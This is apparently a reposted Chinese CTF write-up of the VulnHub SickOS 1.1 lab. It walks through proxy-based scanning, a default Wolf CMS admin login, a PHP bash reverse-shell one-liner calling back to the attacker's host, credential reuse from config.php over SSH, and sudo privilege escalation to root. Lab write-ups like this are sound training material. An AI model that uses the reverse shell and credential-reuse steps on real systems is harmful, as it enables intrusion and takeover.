sickos 靶机渗透(wolf cms 渗透,squid 代理)

news2024/11/15 8:46:43

靶机信息

vulnhub靶机

主机发现

192.168.50.152 为靶机Ip

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 CST
Nmap scan report for 192.168.50.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.152
Host is up (0.000086s latency).
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:FE:9D:85 (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.89 seconds

扫靶机的端口

两个开放的端口

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:02 CST
Nmap scan report for 192.168.50.152
Host is up (0.00026s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 26.35 seconds

tcp扫
openssh 在22端口

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sT -sV -O -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:05 CST
Nmap scan report for 192.168.50.152
Host is up (0.00046s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.10 (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.96 seconds

udp扫一下看看

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sU -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:08 CST
Nmap scan report for 192.168.50.152
Host is up (0.00030s latency).

PORT     STATE         SERVICE
22/udp   open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:45:FB:71 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

漏洞脚本扫描看看

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --script=vuln -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:09 CST
Nmap scan report for 192.168.50.152
Host is up (0.00033s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

渗透

3128端口
在这里插入图片描述

目录爆破

dirb扫一下

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152:3128/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Aug 30 10:26:10 2024
URL_BASE: http://192.168.50.152:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.152:3128/ ----
                                                                                                                          
-----------------
END_TIME: Fri Aug 30 10:26:21 2024
DOWNLOADED: 4612 - FOUND: 0

gobuster

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo gobuster dir -u http://192.168.50.152:3128/ -w /usr/share/wordlists/dirbuster/directories.jbrofuzz
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.50.152:3128/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.50.152:3128/b81e40f1-1fe8-408c-a188-83cb028e2898 => 400 (Length: 3223). To continue please exclude the status code or the length

设置代理扫描

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152/ -p http://192.168.50.152:3128/                                        

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Aug 30 15:35:15 2024
URL_BASE: http://192.168.50.152/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.50.152:3128/

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.152/ ----
+ http://192.168.50.152/cgi-bin/ (CODE:403|SIZE:290)                                                                      
+ http://192.168.50.152/connect (CODE:200|SIZE:109)                                                                       
+ http://192.168.50.152/index (CODE:200|SIZE:21)                                                                          
+ http://192.168.50.152/index.php (CODE:200|SIZE:21)                                                                      
+ http://192.168.50.152/robots (CODE:200|SIZE:45)                                                                         
+ http://192.168.50.152/robots.txt (CODE:200|SIZE:45)                                                                     
+ http://192.168.50.152/server-status (CODE:403|SIZE:295)                                                                 
                                                                                                                          
-----------------
END_TIME: Fri Aug 30 15:35:17 2024
DOWNLOADED: 4612 - FOUND: 7

浏览器也使用代理

在这里插入图片描述看看robots.txt
在这里插入图片描述看看/wolfcms
在这里插入图片描述搜索一下 wolf cms 的后台路径

后台路径/?/admin/login

account: admin
password: admin

来一个一句话, 写在article里

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'");?>

监听, 点击article让php代码加载

拿到shell
在这里插入图片描述

里边看看

┌──(kali㉿kali)-[~]
└─$ sudo ncat -lvnp 443    
[sudo] password for kali: 
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.50.152:45110.
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ whoami
whoami
www-data
www-data@SickOs:/var/www/wolfcms$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
www-data@SickOs:/var/www/wolfcms$ 

看一看配置文件config.php

?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in ca
se of problems.
define('CHECK_TIMEOUT', 3);

"config.php" 85L, 3058C                                       1,1           Top

似乎有东西, root 和 john@123

看一看passwd

www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false                                                                                                                                                                  
messagebus:x:102:105::/var/run/dbus:/bin/false                                                                                                                                                             
whoopsie:x:103:106::/nonexistent:/bin/false                                                                                                                                                                
landscape:x:104:109::/var/lib/landscape:/bin/false                                                                                                                                                         
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin                                                                                                                                                          
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash                                                                                                                                                        
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false                                                                                                                                                    
www-data@SickOs:/var/www/wolfcms$     

unam -a 查看内核信息

www-data@SickOs:/var/www/wolfcms$ uname -a                                                                                                                                                                 
uname -a                                                                                                                                                                                                   
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux                                                                                             
www-data@SickOs:/var/www/wolfcms$  

尝试以sickos登录ssh

sudo ssh sickos@192.168.50.152

password: john@123

sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
sickos@SickOs

查看当前权限账户 sudo -l

sickos@SickOs:~$ sudo -l
[sudo] password for sickos: 
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:~$ 

新起一个bash,可获得root权限

sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
root@SickOs:~# whoami
root
root@SickOs:~# 

找找 flag

root@SickOs:~# ls
root@SickOs:~# pwd
/home/sickos
root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:/root# 


拿下
在这里插入图片描述

总结

主机发现阶段的tcp扫描
开放了22, 3128, 8080, 但是8080关闭
3128开放了squid服务,起代理作用
用3128做代理,访问8080,看到web页面
使用dirb -p 代理,爆破8080的目录
发现8080的robots文件,找到/wolfcms目录
是一个wolfcms的后台路径,/?/admin/login
搜索默认密码,admin admin
观察,发现可执行php,反弹个shell
拿到一个初级shell, 用户为www-data
使用ls 看到config.php, 发现可能的用户名root,可能的密码john@123
查看/etc/passwd, 找到可能的用户
使用密码尝试连接ssh, 发现用户sickos使用了密码john@123作为密码
拿到用户sickos的shell,查看用户权限sudo -l
使用sudo /bin/bash来提权,拿到root的shell
找flag,拿下

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2090299.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Linux 下查找运行中的 Java 进程及 .jar 文件位置

在 Linux 环境中&#xff0c;有时我们需要查找正在运行的 Java 进程以及它们对应的 .jar 文件位置。本文将介绍如何使用命令行工具来实现这一目标。 前言 在 Linux 系统中&#xff0c;我们经常需要监控正在运行的应用程序&#xff0c;特别是在出现问题时&#xff0c;了解应用程…

使用API有效率地管理Dynadot域名,添加账户中的联系人信息

前言 Dynadot是通过ICANN认证的域名注册商&#xff0c;自2002年成立以来&#xff0c;服务于全球108个国家和地区的客户&#xff0c;为数以万计的客户提供简洁&#xff0c;优惠&#xff0c;安全的域名注册以及管理服务。 Dynadot平台操作教程索引&#xff08;包括域名邮箱&…

Android 移除最近任务列表展示

Android 设置应用在最近任务列表不展示 android 中想要实现在最近任务列表中不展示,实现的方式很简单. 在Mainifests的MainActivity中添加: android:excludeFromRecents“true” 如下所示: <activity android:name".MainActivity"android:excludeFromRecents&…

Nvidia股价前景引投资者情绪波动:杠杆ETF数据透视市场风向

一、Nvidia业绩前瞻&#xff1a;看跌情绪升温 随着Nvidia&#xff08;NVDA&#xff09;季度业绩发布日的临近&#xff0c;市场中的投资者情绪似乎正经历着微妙的变化。据多家发行杠杆型交易所交易基金&#xff08;ETF&#xff09;的机构数据显示&#xff0c;投资者对看跌Nvidia…

【机器学习】支持向量机(SVM)的对偶性、核方法以及核技巧

引言 在SVM中&#xff0c;通过引入拉格朗日乘子&#xff0c;可以将原始问题转化为对偶问题&#xff0c;这种转换具有几个重要的优点&#xff0c;包括简化计算和提供更直观的优化问题的解释 文章目录 引言一、支持向量机&#xff08;SVM&#xff09;的对偶性1.1 原始问题&#x…

【知识库系列】MPR/多模态方向观察:图像视频与3D生成

多模态背后的backbone会长成什么样&#xff1f; 各种模态到梯度下降到最后会不会都差不多&#xff1f; Sora 是不是已经被追上了? 我们真的把视频数据都用好了吗&#xff1f; 知识库完整文档&#xff1a; MPR/多模态方向观察&#xff1a;图像视频与3D生成&#xff1a;https…

【Unity3D优化】优化内置shader的内存占用

一、性能分析 监控项目线上的崩溃情况&#xff0c;绝大多数崩溃都是因为低端设备&#xff0c;运行时内存不足&#xff0c;在运行过程中申请开辟新的内存时Crash了。因此&#xff0c;不定期继续优化内存占用。 性能分析首先主要靠Unity3d的Memory Profiler监控一些可追踪到的内存…

初识redis:学习Java客户端

Redis服务器在官网公开了使用的协议&#xff0c;叫做RESP。任何一个第三方都可以通过上述的协议&#xff0c;来实现出一个和redis服务器通信的客户端程序。 Java生态中&#xff0c;封装好了RESP协议&#xff0c;实现的redis客户端是有很多的&#xff0c;此处使用的是jedis&…

操作系统:实验三进程间通信实验

一、实验目的 1、了解什么是信号。 2、熟悉LINUX系统中进程之间软中断通信的基本原理。 3、理解进程的同步关系。 4、掌握用信号实现进程间的同步操作。 5、了解什么是管道。 6、熟悉UNIX/LINUX支持的管道通信方式。 二、实验内容 1、阅读下列程序&#xff0c;执行程序…

【js逆向专题】1.js语法基础

小节目标: 逆向工具准备熟悉 逆向的基本过程熟悉 JavaScript语法 一.前期准备 1. 技术准备 python基础语法爬虫基础功底JavaScript基础语法知识(可以自己偷偷的学习一些) 2. 工具准备 node解释器 官网地址:https://nodejs.org/zh-cn (推荐安装版本16版本) 把提供的软件…

网络层 IV(ARP、DHCP、ICMP)【★★★★★★】

&#xff08;★★&#xff09;代表非常重要的知识点&#xff0c;&#xff08;★&#xff09;代表重要的知识点。 一、地址解析协议&#xff08;ARP&#xff09;&#xff08;★★&#xff09; 在局域网中&#xff0c;由于硬件地址已固化在网卡上的 ROM 中&#xff0c;因此常常将…

Gartner报告解读:如何帮助企业完善数据分析与治理路线图

Gartner服务于全球100多个国家和地区的14,000余家机构&#xff0c;是一家深受客户信赖、观点客观的研究顾问公司。Garnter洞察、建议和工具可帮助您发现创新机遇&#xff0c;完成关键优先任务&#xff0c;助您成为企业不可或缺的战略专家和价值创造者。该公司是标普 500 指数成…

ET6框架(八)事件系统

文章目录 一、事件的定义二、定义异步事件 一、事件的定义 我们打开Client > Unity.Model > Codes > Model > Demo > EventType.cs 即可以查看目前工程中的事件 我们可以此添加事件结构体 我们还需要定义一个事件接收方法&#xff0c;创建路径文件夹及脚本 …

84、 k8s的pod基础+https-harbor

一、pod基础&#xff1a; pod进阶&#xff1a;探针&#xff08;面试必问—扩缩容&#xff0c;挂载&#xff09; 1.1、pod的定义 pod是k8s里面的最小单位&#xff0c;pod也是最小运行容器的资源对象。 容器时基于pod在k8s集群当中工作。 在k8s集群当中&#xff0c;一个pod就…

基于Android+SQLite数据库开发Java考试App

项目简介 Java课程考试App是基于AndroidStudio和SQLite数据库开发的一款App可以实现教师考生双端登录并使用相应功能。以Java课程作为设计主题&#xff0c;针对它们设计、实现一个考试APP。满足教师用户通过APP进行考生管理&#xff08;考生信息的增删改查&#xff09;、试题管…

Python 项目及依赖管理工具技术选型

Python 项目及依赖管理工具&#xff0c;类似于 Java 中的 Maven 与 Node 中的 npm webpack&#xff0c;在开发和维护项目时起着重要的作用。使用适当的依赖管理工具可以显著提高开发效率&#xff0c;减少依赖冲突&#xff0c;确保项目的稳定性、可靠性和安全性。 一、常见项目…

怎样把图片转换成pdf文件?分享图片转PDF的九个转换方法(新)

图片转为pdf怎么弄&#xff1f;图片和pdf是两种完全不同的文件类型&#xff0c;图片转pdf的是一个比较常见的格式转换需求&#xff0c;尤其是需要分享图片合集时。 图片转换成pdf文件可以借助专业的pdf转换器实现&#xff0c;只需要简单几个步骤就能轻松搞定。无论是图片转pdf&…

北斗系统助力低空经济腾飞:未来发展无限可能

近年来&#xff0c;随着科技的飞速发展&#xff0c;北斗卫星导航系统&#xff08;Beidou Satellite Navigation System, BDS&#xff09;在我国乃至全球范围内的应用日益广泛。尤其在低空经济领域&#xff0c;北斗系统作为新基建的重要组成部分&#xff0c;正在发挥着不可替代的…

JMeter之上传文件同时带有参数

文章目录 业务场景使用坑 业务场景 针对下述接口构建jmeter测试&#xff0c;这是个post接口&#xff0c;在上传文件file的同时指定变量groupId的值 PostMapping("/importExcel")public ApiResultDto<String> importExcel(TagChildrenImportDto importDto) {Sec…

Python中对象操作函数

Python中的对象操作函数包括help()、dir()、type()、ascii()等。 1 help()函数 help()函数可以查看指定函数的帮助信息&#xff0c;使用方法如图1所示。 图1 help()函数的使用方法 图1中所示的代码查看了“sorted”函数的帮助信息&#xff0c;包括该函数的作用、参数以及返回…